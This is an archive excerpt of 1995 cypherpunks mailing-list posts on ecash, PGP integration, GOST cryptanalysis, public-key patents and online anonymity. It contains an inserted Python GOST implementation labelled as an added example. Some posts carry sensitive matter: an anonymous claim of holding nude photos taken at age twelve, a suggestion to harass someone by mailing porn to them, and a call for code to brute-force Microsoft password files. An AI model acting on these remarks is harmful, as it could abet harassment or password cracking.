Never assume that something will require too much computing power, until the
computing power needed is not doable in the universe. Then add some, since
(for some problems) someone might figure out a clever way around them. I
worry that factoring may be one of these.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 29 Nov 1995 18:37:56 +0800
To: cypherpunks@toad.com
Subject: Re:(fwd) Like FV with Crypto ... 'Cept Different ...
Message-ID: <v02120d02ace15be5c8a1@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Robert forwarded some propaganda on yet another Internet payment system:

>  WebTrader can be used as a stand-alone Internet application or in
>conjunction with SBT's Pro Series 3.0i accounting software.  WebTrader has a
>suggested retail price of $1,295.
                  ^^^^^^^^^^^^^^^^

They can't be serious. Why would you want to pay $1,300 for a payment
system, when you can get an Ecash merchant account for a fraction of what
Checkfree is charging?


<Insert disclaimer.h>


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmarquis@umich.edu (Robert Marquis, Jr.)
Date: Wed, 29 Nov 1995 09:35:40 +0800
To: cypherpunks@toad.com
Subject: Illustrations
Message-ID: <v01530500ace1589e54c2@[198.109.36.40]>
MIME-Version: 1.0
Content-Type: text/plain


Hello.

I was wondering if anyone had any .gifs or .jpgs (on the web I suppose)
which illustrate how encryption works.  Just simple pictures and
illustrations are fine.  Thanks.

-Bob

____________________________________________
 Robert Marquis, Jr.
 University of Michigan - Dearborn

 e-mail: rmarquis@umich.edu
    www: http://www.umd.umich.edu/~rmarquis






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 29 Nov 1995 09:52:58 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Certificate Authorities?
In-Reply-To: <30BBB178.267A@netscape.com>
Message-ID: <199511290139.UAA02214@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain




> We are looking at adding the ability for enterprise security
> administrators to lock various parts of the Navigator configuration
> so that the user can not change them, including stuff relating
> to trust and certificates.  This functionality will not be in
> 2.0, but we do consider it important for certain customers.

As a Cypherpunk, a reporter and a corporate user of java/hot
java/netscape not only should you do that but have a way of locking in
various class libs..  E.g.  if I want to change the security class
(but don't want my users to do so..) there needs to be a way.. That
SHOULD be in 2.0.

/hawk

Harry Hawk,     Manager of Interactive Communications
                Warwick Baker & Fiore,  212 941 4438,     habs@warwick.com

The Internet has the potential to set us free -- to learn anything and
do anything, whenever we want. No wonder politicians want to regulate
it -- The Washington Post, November 7, 1995, p. A13., Cyber Liberation
[Column], James K. Glassman




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 29 Nov 1995 13:21:18 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <199511290507.VAA10591@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Adam Hupp wrote:

> >Can you imagine??  I'm simply not willing to fool myself into thinking 
> >that I have security by posting a key and using PGP.
> 
> Unless you can post some proof that PGP is insecure, stop insisting it is.

PGP is really not the issue.  The issue is more my security and the
environment that I use PGP in.  I don't have a trusted machine to run PGP
on.  Anyone who wants to can come up to machine and copy my secret keyring
or they can even watch me typing my password in. 

So, I don't fool myself, and I don't use PGP, except for things like
exchanging a one-time pad with someone when I've already sent the message
out across another delivery mechanism, like on a floppy delivered by
courier. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 29 Nov 1995 04:37:04 +0800
To: cypherpunks@toad.com
Subject: NOISE: kidporn (was Re: crypto for porno users)
Message-ID: <199511282024.VAA29706@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Moroni wrote:

> It is the most victimizing of all crimes and I think of speak for some of
> us when I say that it would be better if we all found a way to get back
> to discussing the problems of cryptography as related to we not
> pornographers.

i have some nude pics i took of myself when i was twelve.
i don't *feel* victimized.  maybe i was victimized but 
didn't know it?

gandalf.

PS.  is it a crime for me to keep these pics?
if the cops find them in my locker, will i get busted?
what happens if i give them to someone? is that a crime? 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Wed, 29 Nov 1995 11:20:12 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Certificate Authorities?
In-Reply-To: <30BBC98D.3BD3@netscape.com>
Message-ID: <199511290257.VAA00761@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


>   This is all stuff we are looking at.  It will not be in 2.0 though.
> There is a lot of functionality in 2.0 that should not have to wait
> for this.

Will knowledgeable corporate users be able to change the Security Class
in 2.0 ?




-- 
Harry Hawk,     Manager of Interactive Communications
                Warwick Baker & Fiore,  212 941 4438,     habs@warwick.com

The Internet has the potential to set us free -- to learn anything and
do anything, whenever we want. No wonder politicians want to regulate
it -- The Washington Post, November 7, 1995, p. A13., Cyber Liberation
[Column], James K. Glassman




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Wed, 29 Nov 1995 15:03:44 +0800
To: cypherpunks@toad.com
Subject: Re: PGP hooks for Pegasus Mail?
Message-ID: <23FDF9E10F5@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On 29 Nov 95 at 3:30, Anonymous wrote:

: ----- wake-up rant ON -----
: 
: On 28 Nov 95 at 12:16, Lynne L. Harrison wrote:
: 
: > At 09:52 AM 11/28/95 +0000, you wrote:
: > >Anyone done anything regarding PGP hooks into Pegasus Mail? 
: > >I'm running it at home now (SLIPped into my Linux box), and 
: > >I'd like to find a way to integrate PGP into Pegasus Mail.
: > >
: > >Thanks in advance for any replies...
: > 
: > Ed -
: > 
: >   I haven't heard of anything re: "PGP hooks into Pegasus 
: > Mail".  At one time, Eudora and ViaCrypt were discussing it 
: > but, from what I heard, those discussions fizzled out.
: 
: >   The easiest way to *integrate* is to use a front end program.
: 
: I find it bizarre that what little is going on in real integration of PGP for
: e-mail users is not mentioned on cp, perhaps unknown, certainly not of interest
: to those who should be interested.
: 
[clip]
: 
: Do a million registered users and an e-mail program with hooks already
: originating outside the U.S. penetrate anyone's consciousness?
: 
: ----- wake-up rant OFF -----

-----BEGIN PGP SIGNED MESSAGE-----

 This really should be cross posted to 'the future will be easy to use'
too.

 I subscribed to the cypherpunks list specifically to see what was going
on with Pegasus / PGP now that David Harris has put his promised hooks
into V. 2.2

 For those who don't know, Pegasus is available for DOS, Windows, and
the MAC.  The windows version (and if history is any guide, shortly the
MAC and DOS version will) has hooks for user definable encryption,
decryption, signing, and signature verification.

 Distribution lists, an address book that can include aliases and a
picture can be associated with an alias as well as user defined notes. 
Mail filtering rules.  It's Freeware.

-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
All cats are not gray after midnight.  Endless variety--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Wed, 29 Nov 1995 11:28:34 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <199511290315.UAA26439@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Can you imagine??  I'm simply not willing to fool myself into thinking 
>that I have security by posting a key and using PGP.

Unless you can post some proof that PGP is insecure, stop insisting it is.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Wed, 29 Nov 1995 11:46:29 +0800
To: cypherpunks@toad.com
Subject: Re: spooky URL
Message-ID: <199511290334.UAA21094@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I visited their web page and what they do is record how many hits your page
gets.
I checked out their business partners page and it's no one I have ever heard
of.  Still, it's kind of spooky because unless you notice the Netscape status
line thing you don't know you're being counted.  I imagine it is all put in
a big database and sold to advertisers, etc.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 2 Dec 1995 09:26:32 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: The future will be easy to use
Message-ID: <199511300704.XAA01742@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 27 Nov 1995, James A. Donald wrote:
>> You are making the same erroneous assumption that Phil made when he
>> designed the Web of trust:  You assume that it is important and 
>> interesting to link key ID's to physical bodies.  This is usually
>> not the case:  Linking key ID's to home web pages etc is not only 
>> easier -- it is also usually more interesting and important.

At 02:46 PM 11/29/95 -0500, Jon Lasser wrote:
>Not if you're encrypting a Credit Card transaction to ship physical 
>goods.  In that case, I'm going to certainly want to link a key ID to a 
>physical body (or at least address) if I'm the seller, so as to limit 
>liability as best I can.

Not at all:  All you need to do is be able to prove you shipped 
to the address requested:  You do not have to know what the 
relationship is between the address requested and identity 
paying you to ship.

> However, if you have optional linking of ID and name, shippers will only 
> ship to keys with such attributes. Because just ID and address, it could 
> be a "hit and run" type attack shipped to a safe maildrop.

This argument makes no sense at all:  I am going to attack my
enemies by paying people to send books, computers, and stuff
to them?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian Lane" <blane@eskimo.com>
Date: Thu, 30 Nov 1995 03:14:20 +0800
To: cypherpunks@toad.com
Subject: Re: Inexpensive Crypto Boxes...
Message-ID: <199511290726.XAA17712@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


> It isn't likely to be worth doing this with a sony play-station; its DSP
> capabilities are nothing special, and you're paying way too much for
> irrelevant stuff like CD-ROMs, 3D accelerators, etc. For the same money

  I seem to remember a product from Sony last year that had a CDROM 
drive in it, a small LCD display, and a minimal keyboard. I think it 
was meant for reading encyclopedias or something.

  What would be cool would be a small device like this with a Magneto 
Optical drive in it. Generate yourself a large one-time pad and off 
you go...

  Or, you could have a secure messaging system (running a stripped 
down version of PGP) that could connect to a host via POP3 protocol 
(thru an internal modem of course)  handle your mail, etc.

    Brian
---------------------------------------------------------------------------
blane@eskimo.com                | Electronics, Privacy, Raytracing.
ftp://ftp.eskimo.com/~blane     | Embedded Microprocessor Programmer
http://www.eskimo.com/~blane    |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 30 Nov 1995 10:33:15 +0800
To: Carl Ellison <raph@c2.org
Subject: Re: The future will be easy to use
Message-ID: <199511290808.AAA14767@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 15:30 11/28/95 -0500, Carl Ellison wrote:
>BTW -- PGP currently lacks a way for me to note, when I sign a key, how it
>is that I trust that key (by personal meeting, by attribution, by message
>association, ...).  A signed attribute record would let me record that
>information for myself as well as for others.

There is more to this problem than how it is that I trust the key.  There
is also what I trust it for.  I just added a key to my key ring that I will
use for sending confidential data to a client site.  I trust that no one can
access the secret key who is not also inside their firewall.  However, the
key is on a multi-user system, so I do not trust that it is accessible to
only one person.  Since the data I intend to send will be publicly
available inside the firewall, I don't have to trust more than the
firewall.

It is hard to see how to record the information about how much I trust the
recipient's systems security.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Wed, 29 Nov 1995 17:07:13 +0800
To: cypherpunks@toad.com
Subject: PKP patent hearing
Message-ID: <rschlafly3330854090>
MIME-Version: 1.0
Content-Type: text/plain



Hearing on the validity of the public key patents
=================================================

On Wed., Dec. 6, 1995, 10:00 am, San Jose Federal Bldg, there will
be a hearing on the validity of the Diffie-Hellman, Hellman-Merkle,
RSA, and Schnorr patents.

There are also some annoying procedural technicalities that are
also scheduled to be heard, so we may not get to the patents
right away.  (antitrust standing, sufficiency of pleadings,
admissibility of evidence, etc.)

Details:
Schlafly v. Public Key Partners & RSA Data Security
Case C-94-20512 SW PVT
Hon. Spencer Williams
At the San Jose federal building, 280 S First St.
Ask the US Marshals where Williams' courtroom is while you go thru
the airport-style security.
Court Clerk: 408/535-5364

The Federal Bldg is in downtown San Jose, between 101, 880, and 280.
I will take 280 to SJ, go north on 87, right on the first exit, and
park in the first convenient lot or garage.  There is some street
parking, but the SJ meter maids are very efficient.  If you come
from the north, you may want to take 87 or the Almaden Expwy.  (I get
those mixed up.)

The judge is used to lawyers wearing suits, so try to wear something
that won't appear disrespectful.

Roger Schlafly

phone: 408-476-3550
CompuServe: 76646,323
US Mail: PO Box 1680, Soquel, CA 95073 USA
Internet: rschlafly@attmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Thu, 30 Nov 1995 07:49:53 +0800
To: cypherpunks@toad.com
Subject: Re: GOST for sale
Message-ID: <01HY74DKD11A9IFJI3@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 24 Nov 1995 03:43:25 +0100 (MET)
>From: Mats Bergstrom <asgaard@sos.sll.se>
>Subject: GOST for sale

>According to a short article in a Swedish newspaper (DN)
>with the title 'Spy Code of KGB can make computers safe',
>JETICO INC., located in Finland (Tammerfors), introduced
>a new crypto system on the world market last week. It's
>based on GOST, the Russian federal standard algorithm.
>This product, called BestCrypt, is implemented at least
>partly in hardware. Allegedly it uses 'GOST 28147-89',
>whatever that stands for.

Hmmm.

>GOST is probably very secure - a huge keyspace (256 bits) and
>KGB would not have left a trapdoor for NSA to take advantage
>of, would they?

If this is the cipher I've seen, it's not overwhelmingly impressive,
though it may be OK.  I haven't ever made any serious attempt to
attack it, and I don't know anyone else who has.  Anyone have a
reference?

Basically, GOST is a balanced Feistel network (like DES), but its
F-function is much simpler.  Basically,
F(X,K) = Rotate_Left(S(X+K),11),
where S(t) denotes parallel application of eight 4:4 S-boxes.

Depending on the implementation, these S-boxes' contents could be
key-dependent and pseudorandom, or fixed.  Unfortunately small
random S-boxes are likely to have some weaknesses W.R.T.
differential cryptanalysis.  This can be true even when the S-boxes
are secret and key-derived--see Biham and Biryukov's paper in
Auscrypt '94 on a DES variant with variable S-boxes, for a quick
discussion of this.  And the security of this scheme is very much
going to depend upon the S-boxes used.  If the S-boxes are generated
at (pseudo)random from the key, I'd expect there to be some pretty
nasty weak key conditions that could occasionally come up.

On the other hand, GOST is defined with 32 rounds, so it may be hard
to find any useful differential or linear characteristics, even for
relatively bad S-box choices, that have high enough probability to
get through 29-31 rounds.  And it has a 256-bit key, so even if
someone determines some attack which recovers 160 bits of the key,
there are still 96 bits of key left to provide security.

The GOST key schedule is really simple, though it avoids the most
obvious kind of related key attack.  I wouldn't be surprised to see
some interesting related key attacks be possible.  This is
interesting because there is also a hash function based on GOST--I'd
be pretty reluctant to use this without a lot of analysis.

>The newspaper article ends:
>
>'The Finnish entrepreneurs asseverate that their
>Russian colleagues have never had anything to do
>with the KGB.'

I may be mistaken, but wasn't there some other internal organization
in the USSR that did cryptography?

>Mats

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLv0kkHx57Ag8goBAQFH3AP+JR1sEQCH0ANmNSDFhzpCZb4jn4uqq23v
PjZfFOrYc9SrD1xn+3azqfHFpiHIubfWzZ8u1aNEf4erAErbQLPAUOLPv17zhn//
6UEVKX4GhPqoLfou+wO38rF2DwWdeCjuQm2GgxuFpw5b0D4M3V1mv5ocLOoOMq2N
twdfxiMtO6Y=
=BOER
-----END PGP SIGNATURE-----
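
The structure described in the message above (balanced Feistel, F(X,K) = Rotate_Left(S(X+K),11), eight 4:4 S-boxes, 32 rounds, 256-bit key), as an added example that is not part of the original post; it also measures the differential behaviour of small S-boxes that the post warns about. Assumptions: the S-box tables are stand-ins borrowed from the PRESENT cipher, the subkey order (three forward passes, then one reversed) comes from the published standard rather than from the post, byte order is simplified, and all function names are hypothetical.

```python
# Added example: GOST 28147-89 structure plus a differential check of 4-bit S-boxes.
import random
from collections import Counter

MASK32 = 0xFFFFFFFF

# Assumption: stand-in tables, NOT those of any GOST deployment (the post notes
# they may be fixed or key-dependent). BASE is the S-box published for the
# PRESENT cipher; box i is BASE with its input offset by i.
BASE = [0xC, 5, 6, 0xB, 9, 0, 0xA, 0xD, 3, 0xE, 0xF, 8, 4, 7, 1, 2]
SBOXES = [[BASE[(x + i) % 16] for x in range(16)] for i in range(8)]


def rol32(value, count):
    """Rotate a 32-bit word left by count bits."""
    return ((value << count) | (value >> (32 - count))) & MASK32


def f(x, k, sboxes=SBOXES):
    """F(X, K) = Rotate_Left(S(X + K), 11), with the addition taken modulo 2^32."""
    t = (x + k) & MASK32
    out = 0
    for i in range(8):  # eight 4:4 S-boxes in parallel, one per nibble
        out |= sboxes[i][(t >> (4 * i)) & 0xF] << (4 * i)
    return rol32(out, 11)


def subkeys(key):
    """Eight 32-bit words from the 256-bit key: forward three times, then reversed."""
    if len(key) != 32:
        raise ValueError("GOST key must be 32 bytes (256 bits)")
    words = [int.from_bytes(key[4 * i:4 * i + 4], "little") for i in range(8)]
    return words * 3 + words[::-1]


def _feistel(block, round_keys, sboxes):
    n1, n2 = block & MASK32, (block >> 32) & MASK32
    for rk in round_keys:
        n1, n2 = n2 ^ f(n1, rk, sboxes), n1
    return (n1 << 32) | n2  # undo the swap made by the last round


def encrypt(block, key, sboxes=SBOXES):
    """Encrypt one 64-bit block (given as an int) under a 32-byte key."""
    return _feistel(block, subkeys(key), sboxes)


def decrypt(block, key, sboxes=SBOXES):
    """Same network with the 32 round keys in reverse order."""
    return _feistel(block, subkeys(key)[::-1], sboxes)


def max_differential(sbox):
    """Largest difference-distribution-table entry over nonzero input differences.

    16 means some input difference maps to one output difference with
    probability 1; 4 is the best a 4-bit permutation can achieve.
    """
    worst = 0
    for dx in range(1, 16):
        counts = Counter(sbox[x] ^ sbox[x ^ dx] for x in range(16))
        worst = max(worst, max(counts.values()))
    return worst


def survey_random_sboxes(trials, seed=1995):
    """Tally max_differential over randomly drawn 4-bit permutations."""
    rng = random.Random(seed)
    tally = Counter()
    for _ in range(trials):
        perm = list(range(16))
        rng.shuffle(perm)
        tally[max_differential(perm)] += 1
    return tally


if __name__ == "__main__":
    key = bytes(range(32))            # constructed sample key
    pt = 0x0123456789ABCDEF           # constructed sample block
    ct = encrypt(pt, key)
    print(f"ciphertext {ct:016x}, round trip ok: {decrypt(ct, key) == pt}")
    print("stand-in S-box worst DDT entry:", max_differential(BASE))
    print("XOR-linear S-box worst DDT entry:", max_differential([x ^ 5 for x in range(16)]))
    print("random 4-bit permutations:", sorted(survey_random_sboxes(1000).items()))
```

The survey output shows how often a randomly chosen 4-bit permutation does worse than the best achievable entry of 4, which is the concern raised about key-derived S-boxes.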




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 29 Nov 1995 15:46:58 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: GOST for sale
In-Reply-To: <Pine.HPP.3.91.951124033807.19699B-100000@cor.sos.sll.se>
Message-ID: <199511290728.CAA01862@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mats writes:
> JETICO INC., located in Finland (Tammerfors), introduced
> a new crypto system on the world market last week. It's 
> based on GOST, the Russian federal standard algorithm.
> This product, called BestCrypt, is implemented at least
> partly in hardware. Allegedly it uses 'GOST 28147-89',
> whatever that stands for.

A DejaNews search for "BestCrypt" turned up an announcement by
Sergey Frolov in comp.security.misc
on November 14th. According to him, it implements GOST, single DES, and IDEA.
They have DOS and Windows versions. He says [big sic for this quote]:

	All algorithm available simultaneosly - you may change
	algorithm for your data easy - it's look like to change the password...

	I have non-commercial demo version of the product (370 Kb arjed 
	distributive) and I can send it to people who will be interested in it.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 29 Nov 1995 10:47:12 +0800
To: cypherpunks@toad.com
Subject: Re: PGP hooks for Pegasus Mail?
Message-ID: <199511290230.DAA13064@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


----- wake-up rant ON -----

On 28 Nov 95 at 12:16, Lynne L. Harrison wrote:

> At 09:52 AM 11/28/95 +0000, you wrote:
> >Anyone done anything regarding PGP hooks into Pegasus Mail? 
> >I'm running it at home now (SLIPped into my Linux box), and 
> >I'd like to find a way to integrate PGP into Pegasus Mail.
> >
> >Thanks in advance for any replies...
> 
> Ed -
> 
>   I haven't heard of anything re: "PGP hooks into Pegasus 
> Mail".  At one time, Eudora and ViaCrypt were discussing it 
> but, from what I heard, those discussions fizzled out.

>   The easiest way to *integrate* is to use a front end program.

I find it bizarre that what little is going on in real integration of PGP for e-mail users is not mentioned on cp, perhaps unknown, certainly not of interest to those who should be interested.

What is going on is going on with respect to Pegasus, and what mention of it there is is not on cp but on the Pegasus Mail list.

Apparently cypherpunks *don't* write code, and PMail people *do*.

Do a million registered users and an e-mail program with hooks already originating outside the U.S. penetrate anyone's consciousness?

----- wake-up rant OFF -----





 ------------ http://www.phoenix.net/~tjunker ------------
| Your freedom is on the auction block.  What do you bid? |
 ---------------------------------------------------------
Unofficial Wang VS Information Center




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@hks.net (Leslie Todd Masco)
Date: Wed, 29 Nov 1995 16:59:16 +0800
To: cypherpunks@toad.com
Subject: Re: Untitled
Message-ID: <199511290849.DAA08036@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199511282257.RAA00774@jekyll.piermont.com>,
Perry E. Metzger <perry@piermont.com> wrote:
>
>Anonymous writes:
>> Is this list archived so that I can try to look stuff up before asking 
>> stupid questions?
>
>Yes. Check www.hks.net (I think -- maybe it's hks.com).

http://www.hks.net/cpunks/index.html

It's (still!) in flux, though and hasn't quite gotten those useful
search functions yet.  I'd flame the maintainer, but...
- -- 
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMLwesCoZzwIn1bdtAQHStAF+I0PlsickMkTsVFcbLPMMRPsvap+yD2gR
etQjdnAivni4EzlDH+++XfxX+VpkmX8o
=DhdR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 29 Nov 1995 22:57:16 +0800
To: cypherpunks@toad.com
Subject: Microsoft weak encryption
Message-ID: <199511291447.GAA19250@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Gutmann has an interesting article in sci.crypt, demonstrating how
weak Microsoft's encryption is with basic access control in Windows for
Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
files.  I think a t-shirt is definitely in order for this.

Anyone up for writing some bruting code?

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 1 Dec 1995 00:46:17 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The future will be easy to use
Message-ID: <199511301622.IAA08684@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>Jon Lasser writes:
>> However, if you have optional linking of ID and name, shippers will only 
>> ship to keys with such attributes. Because just ID and address, it could 
>> be a "hit and run" type attack shipped to a safe maildrop.

At 03:19 AM 11/30/95 -0500, Futplex wrote:
>People who steal credit cards prefer to order goods to be delivered somewhere
>they can grab them.

Presumably all of us seek an ecash and echeque system somewhat better
than a human readable sixteen decimal digit number:

Indeed, what I had in mind was a 1024 binary bit number -- we should be
working to a world in which a self generated secret PGP key performs the
functions that a credit card number does today.

>(Often this is just the front of the rightful owner's
>home, while Holly the Homeowner is off at work.) But that's just another
>reason to cut down unauthorized credit card charges, not a reason to restrict
>what a rightful cardholder can do with the card. I _want_ to be able to have
>stuff delivered to arbitrary locations, and I _don't_ want to give that up
>just to make it tough on thieves.
>
>James Donald writes:
>> This argument makes no sense at all:  I am going to attack my
>> enemies by paying people to send books, computers, and stuff
>> to them?
>
>Ordering hardcore porno videos to be sent to, say, somewhere in Tennessee
>might work pretty well in our sadly repressed society.
>
>-Futplex <futplex@pseudonym.com>
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 1 Dec 1995 00:51:07 +0800
To: Carl Ellison <rsalz@osf.org
Subject: Re: The future will be easy to use
Message-ID: <199511301622.IAA08718@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


From: Rich Salz <rsalz@osf.org>
> > There is, of course, no way to interpret the semantics of this
> > electronically.

At 10:11 AM 11/30/95 EST, Carl Ellison wrote:
> Of course not.  In the end, a human needs to make the decision based on
> ASCII text.

For those ascii texts that belong to a small and commonly used set,
we can set our computers to automatically follow certain policies,
and to bring to our attention "special case" texts that lie outside
this set.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 30 Nov 1995 00:58:53 +0800
To: cypherpunks@toad.com
Subject: ecash casino
Message-ID: <199511291640.IAA28114@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Any enterprising cypherpunks in gambling-friendly
jurisdictions interested? I figure it would make ecash take off.. and
you'd get rich.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 29 Nov 1995 22:07:43 +0800
To: cypherpunks@toad.com
Subject: No Privacy Right in US ?
Message-ID: <Pine.BSD.3.91.951129085026.5117L-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
Edupage, 28 November 1995, reports: 
 
             ONLINE ANONYMITY IS ALL RELATIVE 

America Online has revealed the real name of a subscriber 
who called herself "Jenny TRR" to a Caribbean resort owner 
and dive instructor who claim they were defamed in remarks 
she posted on an AOL bulletin board. 
 
AOL gave the subscriber a chance to object to the action, but 
says she didn't attempt to fight the subpoena.  AOL's assis- 
tant general counsel says the service doesn't disclose infor- 
mation about electronic mail, which is protected by the Elec- 
tronic Communications Privacy Act, 
 
         unless it [ electronic mail ] is part of 
                a criminal investigation. 
 
The item cites: Wall Street Journal 24 Nov 95 B1. 
 
 
There's two types of criminal investigations: those of crimes 
and those that are crimes. 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE: 
 
     To subscribe to Edupage send a message to: 
 
                    listproc@educom.unc.edu 
 
     and in the body of the message type: 
 
                  subscribe edupage Joe Louis 
 
(assuming that your name is Joe Louis; if it's not, substitute 
your own name). 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
